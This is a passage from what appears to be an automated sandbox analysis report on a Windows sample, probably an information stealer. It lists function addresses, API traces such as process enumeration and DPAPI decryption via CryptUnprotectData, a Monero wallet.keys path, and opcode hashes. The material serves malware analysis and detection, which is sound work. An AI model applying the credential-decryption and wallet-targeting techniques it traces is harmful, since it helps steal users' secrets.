                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: d97a2f1f9089e1cedc7d5c01da517f76a3983881a79d0338b1a0aed7cac6be17
                              • Instruction ID: ba0b75fec97ac6564f4284d2e4a8404dc84c3a960c19c98d8e339dd744ba51b4
                              • Opcode Fuzzy Hash: d97a2f1f9089e1cedc7d5c01da517f76a3983881a79d0338b1a0aed7cac6be17
                              • Instruction Fuzzy Hash: AD010C75A00208EBCB24DFA5D958BEDB7F8FB48300F108198EA46D7240DB759B44CF61
                              Function 011AFAB6 Relevance: 6.7, Strings: 4, Instructions: 1734COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: :]sn$<wy$=fy$4w
                              • API String ID: 0-2043813047
                              • Opcode ID: 47288bfcf7e541bb021e66183569545578f700d458d4087e4f5b9db31c6131ba
                              • Instruction ID: 54edf3aaae6764c3c4a0fef0f0accc69ccf8a8257d88f9218a056f2b450cd341
                              • Opcode Fuzzy Hash: 47288bfcf7e541bb021e66183569545578f700d458d4087e4f5b9db31c6131ba
                              • Instruction Fuzzy Hash: BFB23AF360C6049FE304AE2DEC8577ABBE9EBD4320F1A463DE6C4C3744E97598058696
                              Function 011B16D8 Relevance: 6.6, Strings: 4, Instructions: 1640COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -Go$4>#$e\c$e\c
                              • API String ID: 0-1158676964
                              • Opcode ID: afa61a0892e925033c8b9025bacdb92940ddfdecece14e28a23c76c310adab28
                              • Instruction ID: 5a42c8039e3ce3397971b985325a50114f3d009593a3a20cc831a2be884de338
                              • Opcode Fuzzy Hash: afa61a0892e925033c8b9025bacdb92940ddfdecece14e28a23c76c310adab28
                              • Instruction Fuzzy Hash: 3DB2E6F360C2049FE304AE2DEC8567AB7E9EF94320F16893DEAC5C7744E63598058697
                              Function 011C5904 Relevance: 6.6, Strings: 4, Instructions: 1612COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: M/{$Qp|${m*$2E
                              • API String ID: 0-2622164832
                              • Opcode ID: bdb3fc50526403288280ed8e7d7b7244ed2a93ac67a1adb852ad6c724c138276
                              • Instruction ID: 6358679d116aeaef0b4832a70c7d9f21f68e1c820b24b76d1b5a890542f8711a
                              • Opcode Fuzzy Hash: bdb3fc50526403288280ed8e7d7b7244ed2a93ac67a1adb852ad6c724c138276
                              • Instruction Fuzzy Hash: 40B207F3A082009FE704AE2DEC8577ABBE9EF94720F16493DE6C4C7744E63598058697
                              Function 00DF8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E005B7), ref: 00DF86CA
                              • Process32First.KERNEL32(?,00000128), ref: 00DF86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00DF86F3
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • CloseHandle.KERNEL32(?), ref: 00DF8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 13de2375701789094fd049e58dbb093793072892d376110ca8717b0f2d9eea34
                              • Instruction ID: 742cccd4e8f89916b3199d2cc1143c6c113ad21825a019b413c246458f40adfc
                              • Opcode Fuzzy Hash: 13de2375701789094fd049e58dbb093793072892d376110ca8717b0f2d9eea34
                              • Instruction Fuzzy Hash: 5F3127B190121CABCB24EF54CC45FEEB778EB49740F1181A9E60EA6190DF746A45CFB1
                              Function 00DF8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00DE5184,40000001,00000000,00000000,?,00DE5184), ref: 00DF8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 83291a4b133f1a44810521b055b3229c340f5a91a61c2b6447a25c928b5e673c
                              • Instruction ID: 47494f05f8b0022e4e692e75ce3ed8f317998b5e9bdc4d7ce45925907992e570
                              • Opcode Fuzzy Hash: 83291a4b133f1a44810521b055b3229c340f5a91a61c2b6447a25c928b5e673c
                              • Instruction Fuzzy Hash: 17110670200208EFDB10CF64D889FBA73A9AF89714F11D448FE598B240DB76E841EB71
                              Function 00DE9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 8a93cd8558a64ece8561a0c04b43fbe8f2269294a23aa0812fd26f59533327df
                              • Instruction ID: 129c905bc1d711d214f83148dd6ac0b9a748e02c9e02ecbbf5f687160fd01a6b
                              • Opcode Fuzzy Hash: 8a93cd8558a64ece8561a0c04b43fbe8f2269294a23aa0812fd26f59533327df
                              • Instruction Fuzzy Hash: 6D11A4B4241208FFEB10CF64D895FAAB7B5FB89700F208058FE159B384C7B6A941CB50
                              Function 00DF7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E00,00000000,?), ref: 00DF79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00E00E00,00000000,?), ref: 00DF79C4
                              • wsprintfA.USER32 ref: 00DF79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: e4e166f3b5a152e8442ba719110141c3bac65a562f58fadca71ee1bc3588b023
                              • Instruction ID: 341fd929aec26f3dcdf41508b6263fbf20f9472329a0ac6c40a84af4f79fbc76
                              • Opcode Fuzzy Hash: e4e166f3b5a152e8442ba719110141c3bac65a562f58fadca71ee1bc3588b023
                              • Instruction Fuzzy Hash: 161115B2A04118EACB249FC9D945BBEB7F8EB4CB11F10425AF645A2684E7795940CBB0
                              Function 00DF7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0197EBF0,00000000,?,00E00E10,00000000,?,00000000,00000000), ref: 00DF7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0197EBF0,00000000,?,00E00E10,00000000,?,00000000,00000000,?), ref: 00DF7A7D
                              • wsprintfA.USER32 ref: 00DF7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 73d8cbc166753137f943fbc8b54b53f8af346b5373a1121081401712dfa0a6d3
                              • Instruction ID: 898ab09815d90c0b4102b7960749e66ad323736eba80725155b604ac406b3079
                              • Opcode Fuzzy Hash: 73d8cbc166753137f943fbc8b54b53f8af346b5373a1121081401712dfa0a6d3
                              • Instruction Fuzzy Hash: 021182B1A45218DFDB208F54DC49FA9B778F704721F114396E60A936C0D7745A40CF50
                              Function 00DF3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(00DFE118,00000000,00000001,00DFE108,00000000), ref: 00DF3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00DF37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 244adc25883f8bcc6f150b77d0aa20ff1d6f798ae32cd0b5023bc18e3971de24
                              • Instruction ID: 5b8ebf536b15b3d36c9e88a9d01025d26e24471ecd6ac5bd044f591e8349a74a
                              • Opcode Fuzzy Hash: 244adc25883f8bcc6f150b77d0aa20ff1d6f798ae32cd0b5023bc18e3971de24
                              • Instruction Fuzzy Hash: 4641E870A00A1C9FDB24DB58CC94BABB7B4BB48702F4181D8E609A7290D771AE85CF60
                              Function 00DE9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                              • LocalFree.KERNEL32(?), ref: 00DE9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: bb64e4f9816e99300129532410b32f15384635650195eab6eeed5028a7262e76
                              • Instruction ID: 44ec17b035c11d7f32329c2b4ab6f327c962803c99e4690edb7f06be4d192650
                              • Opcode Fuzzy Hash: bb64e4f9816e99300129532410b32f15384635650195eab6eeed5028a7262e76
                              • Instruction Fuzzy Hash: 321109B8A00209EFCB04DF94D985AAEB7B5FF88300F1045A8EC15A7344D775AE51CFA1
                              Function 00DEF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
